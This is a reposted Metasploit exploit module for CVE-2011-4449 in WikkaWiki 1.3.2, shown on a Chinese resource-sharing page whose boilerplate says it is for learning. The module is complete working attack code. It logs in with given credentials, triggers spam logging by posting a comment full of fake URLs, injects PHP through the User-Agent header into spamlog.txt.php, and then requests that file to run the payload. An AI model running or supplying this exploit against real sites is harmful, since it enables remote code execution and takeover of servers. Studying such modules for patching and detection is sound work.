也想出现在这里? 联系我们

WikkaWiki 1.3.2 Spam Logging PHP注射的方法

作者 : 小编 本文共5420个字,预计阅读时间需要14分钟 发布时间: 2021-06-5 共2.74K人阅读
也想出现在这里? 联系我们

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require \’msf/core\’ class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, \’Name\’ => "WikkaWiki 1.3.2 Spam Logging PHP Injection", \’Description\’ => %q{ This module exploits a vulnerability found in WikkaWiki. When the spam logging feature is enabled, it is possible to inject PHP code into the spam log file via the UserAgent header , and then request it to execute our payload. There are at least three different ways to trigger spam protection, this module does so by generating 10 fake URLs in a comment (by default, the max_new_comment_urls parameter is 6). Please note that in order to use the injection, you must manually pick a page first that allows you to add a comment, and then set it as \’PAGE\’. }, \’License\’ => MSF_LICENSE, \’Author\’ => [ \’EgiX\’, #Initial discovery, PoC \’sinn3r\’ #Metasploit ], \’References\’ => [ [\’CVE\’, \’2011-4449\’], [\’OSVDB\’, \’77391\’], [\’EDB\’, \’18177\’], [\’URL\’, \’http:// www.jb51.net /trac/wikka/ticket/1098\’] ], \’Payload\’ => { \’BadChars\’ => "\\x00" }, \’DefaultOptions\’ => { \’ExitFunction\’ => "none" }, \’Arch\’ => ARCH_PHP, \’Platform\’ => [\’php\’], \’Targets\’ => [ [\’WikkaWiki 1.3.2 r1814\’, {}] ], \’Privileged\’ => false, \’DisclosureDate\’ => "Nov 30 2011", \’DefaultTarget\’ => 0)) register_options( [ OptString.new(\’USERNAME\’, [true, \’WikkaWiki username\’]), OptString.new(\’PASSWORD\’, [true, \’WikkaWiki password\’]), OptString.new(\’PAGE\’, [true, \’Page to inject\’]), OptString.new(\’TARGETURI\’, [true, \’The URI path to WikkaWiki\’, \’/wikka/\’]) ], self.class) end def check res = send_request_raw({ \’method\’ => \’GET\’, \’uri\’ => "#{target_uri.path}wikka.php?wakka=HomePage" }) if res and res.body =~ /Powered by WikkaWiki/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end # # Get the cookie before we do any of that login/exploity stuff # def get_cookie res = send_request_raw({ \’method\’ => \’GET\’, \’uri\’ => "#{@base}wikka.php" }) # Get the cookie in this format: # 96522b217a86eca82f6d72ef88c4c7f4=pr5sfcofh5848vnc2sm912ean2; path=/wikka if res and res.headers[\’Set-Cookie\’] cookie = res.headers[\’Set-Cookie\’].scan(/(\\w+\\=\\w+); path\\=.+$/).flatten[0] else raise RuntimeError, "#{@peer} – No cookie found, will not continue" end cookie end # # Do login, and then return the cookie that contains our credential # def login(cookie) # Send a request to the login page so we can obtain some hidden values needed for login uri = "#{@base}wikka.php?wakka=UserSettings" res = send_request_raw({ \’method\’ => \’GET\’, \’uri\’ => uri, \’cookie\’ => cookie }) # Extract the hidden fields login = {} if res and res.body =~ /\\<div id\\=\\"content\\"\\>.+\\<fieldset class\\=\\"hidden\\"\\>(.+)\\<\\/fieldset\\>.+\\<legend\\>Login\\/Register\\<\\/legend\\>/m fields = $1.scan(/\\<input type\\=\\"hidden\\" name\\=\\"(\\w+)\\" value\\=\\"(\\w+)\\" \\/>/) fields.each do |name, value| login[name] = value end else raise RuntimeError, "#{@peer} – Unable to find the hidden fieldset required for login" end # Add the rest of fields required for login login[\’action\’] = \’login\’ login[\’name\’] = datastore[\’USERNAME\’] login[\’password\’] = datastore[\’PASSWORD\’] login[\’do_redirect\’] = \’on\’ login[\’submit\’] = "Login" login[\’confpassword\’] = \’\’ login[\’email\’] = \’\’ port = (rport.to_i == 80) ? "" : ":#{rport}" res = send_request_cgi({ \’method\’ => \’POST\’, \’uri\’ => uri, \’cookie\’ => cookie, \’headers\’ => { \’Referer\’ => "http://#{rhost}#{port}#{uri}" }, \’vars_post\’ => login }) if res and res.headers[\’Set-Cookie\’] =~ /user_name/ user = res.headers[\’Set-Cookie\’].scan(/(user_name\\@\\w+=\\w+);/)[0] || "" pass = res.headers[\’Set-Cookie\’].scan(/(pass\\@\\w+=\\w+)/)[0] || "" cookie_cred = "#{cookie}; #{user}; #{pass}" else cred = "#{datastore[\’USERNAME\’]}:#{datastore[\’PASSWORD\’]}" raise RuntimeError, "#{@peer} – Unable to login with \\"#{cred}\\"" end return cookie_cred end # # After login, we inject the PHP payload # def inject_exec(cookie) # Get the necessary fields in order to post a comment res = send_request_raw({ \’method\’ => \’GET\’, \’uri\’ => "#{@base}wikka.php?wakka=#{datastore[\’PAGE\’]}&show_comments=1", \’cookie\’ => cookie }) fields = {} if res and res.body =~ /\\<form action\\=.+processcomment.+\\<fieldset class\\=\\"hidden\\"\\>(.+)\\<\\/fieldset\\>/m $1.scan(/\\<input type\\=\\"hidden\\" name\\=\\"(\\w+)\\" value\\=\\"(.+)\\" \\/>/).each do |n, v| fields[n] = v end else raise RuntimeError, "#{@peer} – Cannot get necessary fields before posting a comment" end # Generate enough URLs to trigger spam logging urls = \’\’ 10.times do |i| urls << "http://www.#{rand_text_alpha_lower(rand(10)+6)}.#{[\’com\’, \’org\’, \’us\’, \’info\’].sample}\\n" end # Add more fields fields[\’body\’] = urls fields[\’submit\’] = \’Add\’ # Inject payload b64_payload = Rex::Text.encode_base64(payload.encoded) port = (rport.to_i == 80) ? "" : ":#{rport}" uri = "#{@base}wikka.php?wakka=#{datastore[\’PAGE\’]}/addcomment" post_data = "" send_request_cgi({ \’method\’ => \’POST\’, \’uri\’ => "#{@base}wikka.php?wakka=#{datastore[\’PAGE\’]}/addcomment", \’cookie\’ => cookie, \’headers\’ => { \’Referer\’ => "http://#{rhost}:#{port}/#{uri}" }, \’vars_post\’ => fields, \’agent\’ => "<?php #{payload.encoded} ?>" }) send_request_raw({ \’method\’ => \’GET\’, \’uri\’ => "#{@base}spamlog.txt.php" }) end def exploit @peer = "#{rhost}:#{rport}" @base = target_uri.path @base << \’/\’ if @base[-1, 1] != \’/\’ print_status("#{@peer} – Getting cookie") cookie = get_cookie print_status("#{@peer} – Logging in") cred = login(cookie) print_status("#{@peer} – Triggering spam logging") inject_exec(cred) handler end end =begin For testing: svn -r 1814 co https://wush.net/svn/wikka/trunk wikka Open wikka.config.php, do: \’spam_logging\’ => \’1\’ =end

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » WikkaWiki 1.3.2 Spam Logging PHP注射的方法

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录